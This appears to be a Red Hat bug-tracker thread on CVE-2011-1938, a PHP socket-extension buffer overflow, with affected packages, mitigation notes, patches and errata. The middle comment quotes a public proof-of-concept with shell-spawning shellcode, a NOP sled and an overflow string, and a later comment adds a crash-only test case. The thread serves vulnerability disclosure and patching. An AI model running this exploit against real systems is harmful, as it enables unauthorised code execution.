A stack-based buffer overflow flaw was found in the way PHP socket extension opened connections to particular address:port on the socket, when AF_UNIX socket family was used. If a remote attacker could trick the local user into opening a connection to specially-crafted address it could lead to PHP application crash, or, potentially arbitrary code execution with the privileges of the user running the application. Note: On Red Hat Enterprise Linux and Fedora the impact of this flaw would be mitigated by FORTIFY_SOURCE protection mechanism to be only crash. References: [1] http://seclists.org/fulldisclosure/2011/May/472 [2] http://bugs.gentoo.org/show_bug.cgi?id=369071 Upstream patch: [3] http://svn.php.net/viewvc?view=revision&revision=311369
This issue did not affect the versions of the php package, as shipped with Red Hat Enterprise Linux 4 and 5. This issue affects the versions of the php53 package, as shipped with Red Hat Enterprise Linux 5. This issue affects the versions of the php package, as shipped with Red Hat Enterprise Linux 6. -- This issue affects the versions of the php package, as shipped with Fedora release of 13, 14 and 15.
Public PoC (from [1]): ====================== POC popping a shell: -- cut -- <?php echo "[+] CVE-2011-1938"; echo "[+] there we go...\n"; define('EVIL_SPACE_ADDR', "\xff\xff\xee\xb3"); define('EVIL_SPACE_SIZE', 1024*1024*8); $SHELLCODE = "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0". "\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1". "\xcd\x80"; echo "[+] creating the sled.\n"; $CODE = str_repeat("\x90", EVIL_SPACE_SIZE); for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ; $i < strlen($SHELLCODE) ; $i++, $j++) { $CODE[$j] = $SHELLCODE[$i]; } $b = str_repeat("A", 196).EVIL_SPACE_ADDR; $var79 = socket_create(AF_UNIX, SOCK_STREAM, 1); echo "[+] popping shell, have fun (if you picked the right address...)\n"; $var85 = socket_connect($var79,$b); ?> -- cut --
As noted above, this issue did not affect php packages in Red Hat Enterprise Linux 4 and 5. This problem was introduced in the following commit: http://svn.php.net/viewvc?view=revision&revision=262814 http://bugs.php.net/bug.php?id=44127 It affects php53 packages in Red Hat Enterprise Linux 5 and php packages in Red Hat Enterprise Linux 6. As mentioned above, this overflow is caught by FORTIFY_SOURCE in both affected versions. This reduces impact of this issue to a crash / abort and blocks code execution. The impact is further reduced by the fact that this problem affects AF_UNIX sockets. It's lot less likely for a PHP script to accept arbitrary untrusted address (file path) when connecting using AF_UNIX socket, than when doing a network connection using AF_INET or AF_INET6 sockets. (In reply to comment #0) > Upstream patch: > [3] http://svn.php.net/viewvc?view=revision&revision=311369 Correction of the above commit: http://svn.php.net/viewvc?view=revision&revision=311370 (In reply to comment #3) > Public PoC (from [1]): Minimal test case without any payload, that can be use to verify the problem can look as: <?php $sock = socket_create(AF_UNIX, SOCK_STREAM, 1); var_dump(socket_connect($sock, str_repeat('A', 1024*1024))); ?>
This is corrected in upstream 5.3.7: http://www.php.net/archive/2011.php#id2011-08-18-1
This issue has been addressed in following products: Red Hat Enterprise Linux 5 Red Hat Enterprise Linux 6 Via RHSA-2011:1423 https://rhn.redhat.com/errata/RHSA-2011-1423.html
Statement: Not vulnerable. This issue did not affect the versions of php as shipped with Red Hat Enterprise Linux 4 and 5. It has been addressed in Red Hat Enterprise Linux 5 (php53) and 6 (php).